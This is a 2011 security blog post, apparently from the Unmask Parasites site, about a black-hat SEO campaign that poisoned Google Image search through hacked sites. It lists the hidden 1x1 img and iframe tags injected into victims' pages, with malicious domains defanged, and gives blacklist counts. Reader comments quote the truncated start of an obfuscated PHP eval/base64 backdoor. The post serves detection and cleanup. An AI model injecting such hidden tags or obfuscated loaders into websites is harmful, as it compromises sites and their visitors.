msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Imgaaa .net And Other Blacklisted Domains Used in Google Image Search Poisoning

   08 May 11   Filed in Short Attack Reviews

This is a short follow up on my post about hacked sites that poisoned Google Image search results.

As I mentioned in that post, most compromised sites where hackers created malicious doorway pages, contained one of the following images or iframes in their legitimate index pages.

Imgaaa .net

<img heigth="1" width="1" border="0" src="hxxp://imgaaa .net/t.php?id=6214178">

Alcobro .net

<iframe heigth="1" width="1" frameborder="0" src="hxxp://alcobro .net/t.php?id=3048415"></iframe>

Myteenmovies .net

<img heigth="1" width="1" border="0" src="hxxp://myteenmovies .net/t.php?id=5360168">

Curem .net

<iframe heigth="1" width="1" frameborder="0" src="hxxp://curem .net/t.php?id=1517731"></iframe>

Imgddd .net

<img heigth="1" width="1" border="0" src="hxxp://imgddd .net/t.php?id=16093394">

Zoomt .net

<iframe heigth="1" width="1" frameborder="0" src="hxxp://zoomt .net/t.php?id=143230"></iframe>

Numbers in URLs may vary.

The following domain names are also point to the same IP address and may be used in this attack: imgbbb.net, imgccc .net, imgddd .net, ingeee .net. I haven’t seen malicious code with these domains yet though.

Since I sent my information to Google last Thursday, they did a good job of scanning and blacklisting most sites I reported to them.

Calculations

For such blacklisted sites, you’ll see one of the above-mentioned domain names in Safe Browsing diagnostic pages. This makes it possible to count blacklisted sites that were the part of this black hat SEO campaign.

Imgaaa .net — 7,091 infected domains
Alcobro .net — 1,513 infected domains
myteenmovies .net — 2,347 infected domains
Curem .net — 4,075 infected domains
Zoomt .net — 243 infected domains
Imgddd.net — not blacklisted yet
——————————————————
Total — 15,269 infected domains

As you can see, I used quite a small number (5,000) of infected sites in my calculations of the problem scale in the last post.

Of course, this new number is not perfect either. On the one hand, this number can grow as Google detects more and more compromised sites (and imgddd domain is not even blacklisted yet). On the other hand, a few webmasters told me that some blacklisted sites with “imgaaa” in diagnostic pages, don’t have doorway pages for some reason — only the above-mentioned code in legitimate files. So the number of sites with the image result hijacking doorway pages should be lower than the number of blacklisted sites. To make things even more complex, one blacklisted domain may contain several malicious spam-generating scripts in different subdirectories (I saw sites with 7 such scripts in different subdirectories).

Update (May 10th, 2011): The imgddd .net domain is finally blacklisted. At this point Google is aware of 2,292 6,053 sites with injected “imgddd” code.

Update (May 11th, 2011):

Today I came across an infected site with the imgbbb malicious code

<img heigth="1" width="1" border="0" src="hxxp://imgbbb .net/t.php?id=14401539">

Google has blacklisted this domain too. At this point Google is aware of 2,681 sites with injected “imgbbb” code.

Update (May 16th, 2011):

New domain: adam-love .net

<img heigth="1" width="1" border="0" src="hxxp://adam-love. net/t.php?id=14752333">

Google currently knows about 1,059 infected sites.

The total number of know infected sites as of May 16th: 34,459

Update (May 30th, 2011):

New domain:  eozljijd .co.cc -- not blacklisted yet

<img heigth="1" width="1" border="0" src="hxxp://eozljijd .co.cc/1986725.jpg">

Note how they changed /t.php?id=14752333 image links to /1986725.jpg to make them look less suspicious.

To Webmasters

You can find detection and clean up instructions in my previous post or you can contact me if you need my help in resolving this issue.

Related posts:

Reader's Comments (8)

  1. |

    Got hacked 10 days ago on several sites. One of them got blacklisted by Google (thats how it was found).

    The pattern used “imgddd.net” on the same day, on all sites.
    It infected mostly Linux servers, working exactly as you described:
    – appending the “<img …” on every “index.php” and “index.html” files
    – creating a “.log” folder with the daily generated cache keyword pages
    – creating a “##.php” or “aaa.php” file
    – creating a “.htaccess” file when one did not exist, redirecting to file above

    Now, after cleaning, i deleted all FTP passwords from FTP client (lazyy..), altered all of them, and saved them on LastPass, and just finished a thorough system scan.
    Tomorrow, will scan other computers and change all FTP passwords again…

    You did a great research! Thanks.
    It seems as this virus is spreading quickly since January if u check Alexas ranks for the domains mentioned.

    • |

      That’s for the summary.

      By the way, are those “##.php” and “aaa.php” files identical or not?

      • |

        Hi Denis,

        Yes, actually, they are!
        However, this file was not created on all servers, only on a couple!

        One of them was named “aig.php” and the other “aarp.php”

        In my case, their content is:

        I’ve learned my lesson! Never storing passwords on FTP client again..
        Also never using Google Images again… lol

        I had requested the rescan malware thru GWT and they removed the site from the blacklist with less than 10h.
        Phew… All looks ok for now.

        • |

          The tags were trimmed by the validator.
          The content is:
          <? eval(gzuncompress(base64_decode(‘eNqVWG2P4kYM/jOVu… P/AbQiT9I=’))); ?>

    • |

      Same at one of our sites, only the .htaccess wasn’t changed. And there was a file called microphones.php, file size 11445 Bytes.

      Content started with
      “<? eval(gzuncompress(base64_decode('eNqVWG2P4kYM/jOVu

  2. |

    Thanks for info, My website has also been hit by malware, but it was cleaned up and reported to google. I’m still waiting …

  3. |

    The hackers need to clean up their spelling, image ‘heigth’?